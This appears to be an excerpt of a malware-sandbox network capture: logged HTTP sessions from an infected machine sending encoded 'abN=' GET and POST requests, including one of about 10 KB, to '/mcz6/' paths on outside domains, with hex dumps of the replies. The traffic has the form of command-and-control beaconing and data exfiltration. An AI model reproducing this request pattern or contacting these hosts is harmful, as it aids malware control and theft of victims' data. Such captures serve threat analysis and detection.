30 6e 30 74 56 78 55 6c 6e 6e 67 61 42 72 50 73 44 53 68 48 5a 36 77 38 67 61 44 4d 4c 4a 41 2b 4c 32 31 76 56 57 77 6e 44 46 75 4a 50 49 30 4d 6d 45 35 35 64 44 6a 48 38 6b 49 70 53 38 7a 52 56 41 75 6a 42 2f 58 57 61 54 35 5a 2b 47 46 74 62 66 4a 31 59 76 66 47 4e 39 33 69 76 71 61 66 6e 59 4d 51 56 4e 4b 43 65 45 7a 72 6f 4f 75 33 34 35 72 49 37 44 78 6c 5a 49 66 31 37 73 56 72 76 2f 2f 36 6e 57 47 4f [TRUNCATED] Data Ascii: abN=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmJA6c1ITeci4n0YhR80dnFX/05Iy9Oj9FsNPbqpaLDmi3YfNNST5p+PKeCMWpJY1N94V+mSXs4Uetum8186Jrrf1ra8tSKMBWW/80AG489mE8xw5OBEDjc9WRnGqlVsIqFqsdAmfRnWW8Ky9DtJbVQsVV5vCDm0n0tVxUlnngaBrPsDShHZ6w8gaDMLJA+L21vVWwnDFuJPI0MmE55dDjH8kIpS8zRVAujB/XWaT5Z+GFtbfJ1YvfGN93ivqafnYMQVNKCeEzroOu345rI7DxlZIf17sVrv//6nWGO8Kx0ipKCYQyZJab/evwhRiIseNXwa05Vzbl/FOXpdiImkHALPA0mbmodT39B82ybKS0v/ZxcyB38b7sWbHUPRdiPUCKCGMUjcafEEjlndBoVHy/svcIzCiQWckYbwwiKTnU0P6Dws9bRTzGawVTuTFxKrkKHi3kpUAsjp9Tw0B4pMwPiKrkubL2T7JdGx37gQKJUjMmqfPulAYYqggN6PZWu2RH+mY0351E4x3gHSH/yPwJn3gV31T6yiVLgcTmZfcoLzIOk5avnbPZlZYfm9Bv7sE8rvNKgjgNvgxW2RKRndrdCmNv/AeZHz8qkrG8KrTTnrlqJaYlBVEf6xX75iGm4levZ+13QkoVYN5x71eQzkXWtZUlt2tAbN0VVTf0FT9jU/YEebAFybA8wkdhx4AUyMjX4Adn1ZkFAcoJ5WWxPjR2+r20Wy7LPPa2EHk86RGHNEsEVIMwtsbck1i7al4d1gcAUo1OUDALwpEw1KDpJa8Qy/2TJJok25pUSwrNR4nLVl7mIlk87j2tudjl4c/XKh16GRUBooUoxcgKP5y84w30ptKpwspIzGHUbkHK74B/uauWclSkNxAxCOrK8S9MBFNaxnl1hJqP6VW7TYYi7tPi8eJS4vzIaGR1MlR3pEgk5nmMIKxvz7/DxZs6vJKo7ptRX+E3Q89 [TRUNCATED]
Jun 5, 2024 15:09:17.216607094 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:09:17 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	49792	162.241.216.140	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:09:19.097532034 CEST	479	OUT	GET /mcz6/?abN=jpQBXhuFRU/tY42AZC12Q1/B5+IE3XzQLSvL4WMkje8Ac0YXf6PnpjUwWfsjtXOk/4EuhOubIcIRVaFREiblre7wMQ7hpfbmYAEsuIkYCegYwn6boLYQuO8=&HV8hD=_ZnHYJfHNd6deTQP HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 5, 2024 15:09:19.758676052 CEST	479	IN	HTTP/1.1 404 Not Found Date: Wed, 05 Jun 2024 13:09:19 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	49793	217.160.0.111	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:09:24.813693047 CEST	739	OUT	POST /mcz6/ HTTP/1.1 Host: www.carliente.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.carliente.com Referer: http://www.carliente.com/mcz6/ Connection: close Content-Length: 200 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4e 62 45 38 56 56 65 51 73 41 70 76 48 6c 35 75 76 6e 39 64 69 5a 78 70 34 6e 66 30 50 48 37 5a 52 65 56 68 59 79 79 61 43 32 62 52 38 4b 2f 4d 5a 64 49 39 47 77 59 6a 43 6f 30 77 38 32 45 72 6c 55 48 65 4e 4c 7a 50 58 47 30 36 48 66 39 72 66 79 6d 46 62 34 32 61 69 6e 62 57 56 61 76 45 4d 71 32 72 4d 47 31 70 70 42 64 30 37 51 49 43 50 4f 63 62 63 75 75 42 6c 7a 71 67 71 6c 39 72 71 70 34 45 70 36 30 45 6c 67 52 37 71 37 30 4e 43 58 76 4c 68 37 57 76 71 6a 6d 56 6b 2f 72 47 65 37 30 38 57 54 30 63 33 2f 55 6c 36 4c 62 48 4a 78 31 42 76 67 3d 3d Data Ascii: abN=g0NNOeEZLnaHNbE8VVeQsApvHl5uvn9diZxp4nf0PH7ZReVhYyyaC2bR8K/MZdI9GwYjCo0w82ErlUHeNLzPXG06Hf9rfymFb42ainbWVavEMq2rMG1ppBd07QICPOcbcuuBlzqgql9rqp4Ep60ElgR7q70NCXvLh7WvqjmVk/rGe708WT0c3/Ul6LbHJx1Bvg==
Jun 5, 2024 15:09:25.644465923 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 05 Jun 2024 13:09:25 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Jun 5, 2024 15:09:25.644511938 CEST	212	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7
Jun 5, 2024 15:09:25.644531012 CEST	687	IN	Data Raw: 92 8e a8 10 87 09 4a 51 64 f7 ad 2b 45 b4 49 c9 9b f1 15 d6 3f 7f 32 07 08 80 9d d0 9b 2e fb c7 1c f8 51 e0 ae 22 e0 78 aa 93 f0 90 ce d7 58 13 5b 19 d2 de b0 fa e1 fa 69 ef 6f ea 6b ce 16 63 81 1f 3a bc 81 1e 9a be c7 d7 e3 16 d0 f5 99 af e2 38 Data Ascii: JQd+EI?2.Q"xX[iokc:8WeDZ4(:V41J}D#nu:Z3;6`9aKf.U[n6F5glJSsTEcfK\|i(eOx.

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	49794	217.160.0.111	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:09:27.343163967 CEST	759	OUT	POST /mcz6/ HTTP/1.1 Host: www.carliente.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.carliente.com Referer: http://www.carliente.com/mcz6/ Connection: close Content-Length: 220 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4c 34 63 38 57 32 47 51 39 77 70 75 49 46 35 75 6c 48 39 5a 69 5a 4e 70 34 6d 62 6b 50 31 76 5a 52 37 70 68 5a 33 53 61 46 32 62 52 7a 71 2f 46 58 39 49 4d 47 77 56 65 43 71 77 77 38 32 51 72 6c 55 33 65 4e 39 37 49 56 57 30 34 50 2f 39 31 53 53 6d 46 62 34 32 61 69 6a 37 38 56 5a 66 45 4e 61 47 72 4e 6c 74 32 6c 68 64 37 79 77 49 43 65 65 63 66 63 75 76 78 6c 79 47 61 71 67 35 72 71 6f 49 45 6f 6f 51 44 75 67 52 48 6c 62 31 74 4f 43 53 39 72 71 53 6d 33 51 4f 45 75 73 7a 48 66 39 6c 6d 48 69 56 4c 6c 2f 77 57 6e 4d 53 7a 45 79 49 49 30 6b 62 2b 70 42 77 73 31 75 37 31 39 6c 34 56 75 62 39 58 35 77 41 3d Data Ascii: abN=g0NNOeEZLnaHL4c8W2GQ9wpuIF5ulH9ZiZNp4mbkP1vZR7phZ3SaF2bRzq/FX9IMGwVeCqww82QrlU3eN97IVW04P/91SSmFb42aij78VZfENaGrNlt2lhd7ywICeecfcuvxlyGaqg5rqoIEooQDugRHlb1tOCS9rqSm3QOEuszHf9lmHiVLl/wWnMSzEyII0kb+pBws1u719l4Vub9X5wA=
Jun 5, 2024 15:09:28.172183037 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 05 Jun 2024 13:09:28 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Jun 5, 2024 15:09:28.172216892 CEST	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	49795	217.160.0.111	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:09:29.949623108 CEST	10841	OUT	POST /mcz6/ HTTP/1.1 Host: www.carliente.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.carliente.com Referer: http://www.carliente.com/mcz6/ Connection: close Content-Length: 10300 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 61 62 4e 3d 67 30 4e 4e 4f 65 45 5a 4c 6e 61 48 4c 34 63 38 57 32 47 51 39 77 70 75 49 46 35 75 6c 48 39 5a 69 5a 4e 70 34 6d 62 6b 50 31 33 5a 52 4a 78 68 62 57 53 61 45 32 62 52 74 36 2f 49 58 39 49 72 47 77 4d 5a 43 71 38 47 38 30 6f 72 6e 31 58 65 61 34 62 49 66 57 30 34 44 66 39 6f 66 79 6d 71 62 37 65 65 69 6e 58 38 56 5a 66 45 4e 59 65 72 4b 32 31 32 6e 68 64 30 37 51 49 4f 50 4f 63 37 63 75 32 4a 6c 79 7a 74 72 54 78 72 71 49 59 45 71 61 49 44 6e 67 52 2f 78 37 31 50 4f 43 57 75 72 75 7a 66 33 52 36 75 75 71 50 48 64 4c 34 72 65 54 4a 50 78 64 45 52 37 64 36 62 64 77 41 50 38 46 50 44 73 67 55 6e 70 65 79 59 77 30 5a 4e 72 4b 34 52 69 56 38 63 78 65 2b 58 50 37 6b 2b 68 55 70 74 2f 42 30 65 2f 62 69 55 64 2b 35 50 64 43 58 49 66 56 37 4f 77 31 76 65 2f 57 63 76 47 68 6f 57 43 38 5a 73 5a 39 44 52 30 62 42 44 79 78 69 2f 54 70 42 68 6c 77 58 66 53 55 35 66 75 32 72 55 57 4c 52 43 39 6a 34 51 39 79 30 4e 68 62 72 4d 33 74 49 53 78 59 42 69 65 74 6d 35 57 2f 49 7a 78 55 57 58 6c 2b 74 47 4b 41 [TRUNCATED] Data Ascii: abN=g0NNOeEZLnaHL4c8W2GQ9wpuIF5ulH9ZiZNp4mbkP13ZRJxhbWSaE2bRt6/IX9IrGwMZCq8G80orn1Xea4bIfW04Df9ofymqb7eeinX8VZfENYerK212nhd07QIOPOc7cu2JlyztrTxrqIYEqaIDngR/x71POCWuruzf3R6uuqPHdL4reTJPxdER7d6bdwAP8FPDsgUnpeyYw0ZNrK4RiV8cxe+XP7k+hUpt/B0e/biUd+5PdCXIfV7Ow1ve/WcvGhoWC8ZsZ9DR0bBDyxi/TpBhlwXfSU5fu2rUWLRC9j4Q9y0NhbrM3tISxYBietm5W/IzxUWXl+tGKAy/RcUv7aTPpnvW3vvh5PJu1xEDab34FXf8IP18UaoRYqPDCuzmV6242wZQhnI7sVt3sC+MxcBIesSquydcQ9setJVNRYkKdC7vDi6iEgTK0sMycGRODzml496g24GVng8EL7C4eUGbfQpprORlQVF6e6xPdKFlcjY6nLoMkF56aFvkkMsOCyCpdL1d9zTNR71Ss3WC6A1JCUGgzZsIfjEC+XbhGWIPPy5sm/b7GyDJlnKclearClb7vU0qSpc6dJYlLUHdIm/bv19RMQEl5KPKaHi1TdON3yld67P+t7geRpr2fQyQw3In9pJR5ah5NVcxRo1ITUBtXHGqQzFiq1dlBf0U8SCnv6B8EBQFYi797o7EXDwe8OQ72e8Fo7X2ALQFiQkgPBF+9cRomEr7c3j4u12jxVyH8P1ndvu8hD0csIn8DliWDW8jStDgT63bSu9vQQA0AhAzK+UYeYsWmN3uACQSeUIqWgSQxouFQFwZb6IKNg76V72HUt0o9QGbXBM9jEvlMfIuE7IR2UxUAoDDplkTRidj4NVFMqOciTby2UeJsCmQ49Ew4/lJ20drBmyK1Uy8qT9O1p5KWMlj1NyReDn67SOyHN7eEUiPE3tJfitjPvq09l7ZaGz9xFRJCcb9/uO9E2x5w+Twjoy7fSKyFjwt6yPrRsL8 [TRUNCATED]
Jun 5, 2024 15:09:30.778362989 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Wed, 05 Jun 2024 13:09:30 GMT Server: Apache Content-Encoding: gzip Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED] Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m\|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H\|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1\|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
Jun 5, 2024 15:09:30.778405905 CEST	899	IN	Data Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5 Data Ascii: H\|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	49796	217.160.0.111	80

Timestamp	Bytes transferred	Direction	Data
Jun 5, 2024 15:09:32.485605001 CEST	479	OUT	GET /mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=t2ltNu02BWCxFJkMInGc7SUNVmZAlmpo25Fvtgz0OT6/eZJtaFugFEP80bfDefIKNSUaDat+4U4ei33vOp33J3w7E/1DXRKVU7+ltx/Ze5a9KKXUCEtCgjk= HTTP/1.1 Host: www.carliente.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 5, 2024 15:09:33.311494112 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 4545 Connection: close Date: Wed, 05 Jun 2024 13:09:33 GMT Server: Apache Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" 